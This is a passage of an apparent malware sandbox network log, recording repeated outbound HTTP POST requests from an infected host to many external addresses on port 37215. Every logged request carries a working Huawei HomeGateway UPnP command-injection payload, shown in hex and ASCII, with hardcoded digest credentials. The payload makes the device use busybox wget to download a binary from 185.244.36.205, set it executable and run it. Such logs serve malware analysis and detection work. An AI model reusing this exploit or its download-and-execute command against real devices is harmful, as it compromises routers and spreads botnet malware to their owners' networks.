                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              439192.168.2.154346441.149.122.23637215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:13.719353914 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              440192.168.2.1560748190.11.156.21937215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:13.719353914 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              441192.168.2.1549488122.104.206.2337215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:13.719387054 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              442192.168.2.155767494.145.29.6537215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:13.719389915 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              443192.168.2.1555002102.100.41.11037215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:13.719409943 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              444192.168.2.155078494.107.223.18537215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:13.719435930 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              445192.168.2.154322445.199.93.17937215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:13.719441891 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              446192.168.2.1560818190.152.91.9737215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:13.719456911 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              447192.168.2.153745294.216.127.4737215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:13.719469070 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              448192.168.2.1536082181.23.201.10137215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:13.719502926 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              449192.168.2.1541066138.26.58.2737215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:13.719520092 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
